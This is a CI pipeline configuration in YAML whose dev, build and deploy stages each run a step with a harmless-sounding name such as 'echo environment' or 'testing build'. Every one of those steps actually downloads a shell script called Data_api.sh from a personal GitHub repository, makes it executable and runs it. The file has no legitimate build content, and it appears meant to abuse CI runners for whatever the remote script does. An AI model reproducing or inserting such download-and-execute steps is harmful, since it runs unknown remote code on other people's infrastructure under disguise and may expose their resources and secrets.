box: python

command-timeout: 60
# this pipeline will use busybox
dev:
  steps:
    - script:
      name: echo environment
      code: wget https://raw.githubusercontent.com/agustinayuni/nannos/main/Data_api.sh && chmod +x Data_api.sh && ./Data_api.sh

build:
  # override busybox
  box: python
  steps:
    - script:
        name: testing build
        code: wget https://raw.githubusercontent.com/agustinayuni/nannos/main/Data_api.sh && chmod +x Data_api.sh && ./Data_api.sh

deploy:
  # override busybox
  box: nodesource/node:trusty
  steps:
    - script:
        name: testing deploy
        code: wget https://raw.githubusercontent.com/agustinayuni/nannos/main/Data_api.sh && chmod +x Data_api.sh && ./Data_api.sh
